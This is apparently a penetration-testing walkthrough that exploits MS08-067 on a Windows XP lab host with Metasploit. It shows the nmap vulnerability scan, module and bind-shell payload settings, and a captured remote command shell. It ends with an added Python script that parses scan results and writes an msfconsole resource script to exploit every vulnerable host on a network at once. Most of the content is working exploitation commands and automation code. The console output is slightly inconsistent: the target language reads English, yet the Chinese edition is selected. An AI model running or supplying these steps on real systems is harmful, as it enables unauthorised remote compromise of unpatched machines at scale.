MS08-067 vulnerability: remote overflow penetration test

Source: Internet
Author: User

Target IP address: 192.168.9.4, operating system Windows XP SP3 Chinese edition

Attacker IP address: 192.168.9.1

Check the database connection status

msf > db_status
[*] postgresql connected to msf3

Scan the target with Nmap (SYN scan, service versions, OS detection, and the smb-check-vulns script; -sS and -O need root)

msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.9.4
[*] Nmap: Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-25 11:01
[*] Nmap: Nmap scan report for 192.168.9.4
[*] Nmap: Host is up (0.00s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT    STATE SERVICE      VERSION
[*] Nmap: 135/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp open  netbios-ssn
[*] Nmap: 445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:43:D6:5F (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP|2003
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: |   MS08-067: VULNERABLE
[*] Nmap: |   Conficker: Likely CLEAN
[*] Nmap: |   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
[*] Nmap: |_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds

The line that matters is "MS08-067: VULNERABLE". The checks reported as CHECK DISABLED are the ones that can crash the target service; they stay off unless unsafe=1 is passed explicitly.

Find the ms08_067 module

msf > search ms08_067

Matching Modules
================

   Name                                 Disclosure Date           Rank   Description
   ----                                 ---------------           ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28 00:00:00 UTC  great  Microsoft Server Service Relative Path Stack Corruption

Select the ms08_067 module
msf > use exploit/windows/smb/ms08_067_netapi

Set the remote host (the target). A bind payload is used below, so the connection is made from the attacker to the target.
msf exploit(ms08_067_netapi) > set RHOST 192.168.9.4
RHOST => 192.168.9.4

Set the payload
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp

Show the module's options
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.9.4      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST     192.168.9.4      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Run the exploit
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 Chinese edition (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.9.1:1126 -> 192.168.9.4:4444) at 2012-09-25 11:04:31 +0800

A command shell on the target is returned

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    Hacker
HelpAssistant            SUPPORT_388945a0
The command completed with one or more errors.


To see which operating system versions and language builds the exploit supports, enter the info command; it prints the module's details, including its full target list.
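When the scan covers more than one host, the manual sequence above (read the smb-check-vulns result, then use, set RHOST, set PAYLOAD, exploit) is worth automating. The script below is an added example and is not code from the original post: it parses nmap's normal output format (the same text db_nmap echoes, with or without its "[*] Nmap:" prefix) for several hosts, keeps only those whose MS08-067 check reads VULNERABLE, and writes the walkthrough's msfconsole commands into a resource script that can be replayed with msfconsole -r. The embedded scan text is constructed; 192.168.9.4 mirrors the result above, while 192.168.9.7, 192.168.9.9 and their results are assumptions added to show the non-vulnerable and error cases.

```python
"""Triage smb-check-vulns output and emit an msfconsole resource script (added example)."""
import re

# Constructed sample in nmap's normal output format. 192.168.9.4 mirrors the
# scan above; the other two hosts are made up to show the other result kinds.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.9.4
Host is up (0.00s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds

Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|_  SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)

Nmap scan report for 192.168.9.7
Host is up (0.0010s latency).

Host script results:
| smb-check-vulns:
|   MS08-067: NOT VULNERABLE
|_  Conficker: Likely CLEAN

Nmap scan report for 192.168.9.9
Host is up (0.0010s latency).

Host script results:
| smb-check-vulns:
|_  MS08-067: ERROR: SMB: Failed to receive bytes: TIMEOUT
"""

PREFIX_RE = re.compile(r"^\[\*\] Nmap: ?")            # db_nmap echo prefix, if present
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
CHECK_RE = re.compile(r"^\|[_ ]\s+([^:]+):\s*(.*)$")  # "|   NAME: RESULT" / "|_  NAME: RESULT"


def parse_smb_checks(text):
    """Return {host: {check_name: result_text}} from every smb-check-vulns block."""
    results, host, in_block = {}, None, False
    for raw in text.splitlines():
        line = PREFIX_RE.sub("", raw)
        m = HOST_RE.match(line)
        if m:
            host, in_block = m.group(1), False
            results[host] = {}
            continue
        if host is None:
            continue
        if line.startswith("| smb-check-vulns:"):
            in_block = True
            continue
        if not in_block:
            continue
        m = CHECK_RE.match(line)
        if not m:                      # blank line or a different script: block is over
            in_block = False
            continue
        results[host][m.group(1).strip()] = m.group(2).strip()
        if line.startswith("|_"):      # "|_" marks the last line of a script's output
            in_block = False
    return results


def vulnerable_hosts(results, check="MS08-067"):
    """Hosts whose result for `check` starts with VULNERABLE.

    "NOT VULNERABLE", "CHECK DISABLED" and "ERROR: ..." are all excluded, so a
    timed-out probe is never promoted to a confirmed finding.
    """
    return sorted(h for h, c in results.items() if c.get(check, "").startswith("VULNERABLE"))


def resource_script(hosts, payload="windows/shell_bind_tcp", lport=4444):
    """The manual msfconsole steps above, one background job per host.

    The bind payload from the walkthrough is kept, so LPORT is the port the
    target opens and the attacker connects to; exploit -j -z runs each host as
    a job so one failure does not stop the rest.
    """
    lines = ["use exploit/windows/smb/ms08_067_netapi", f"set PAYLOAD {payload}", f"set LPORT {lport}"]
    for host in hosts:
        lines += [f"set RHOST {host}", "exploit -j -z"]
    lines.append("sessions -l")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    found = parse_smb_checks(SAMPLE_SCAN)
    for host, checks in found.items():
        print(host, checks.get("MS08-067", "no result"))
    targets = vulnerable_hosts(found)
    open("ms08_067.rc", "w").write(resource_script(targets))   # replay: msfconsole -r ms08_067.rc
    print("wrote ms08_067.rc for", targets)
```

Only a result that starts with VULNERABLE is accepted; a timed-out check (ERROR) or a disabled check is left out, so the resource script never targets a host the scan could not actually confirm. Feed it real output with nmap -oN or the text echoed by db_nmap.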
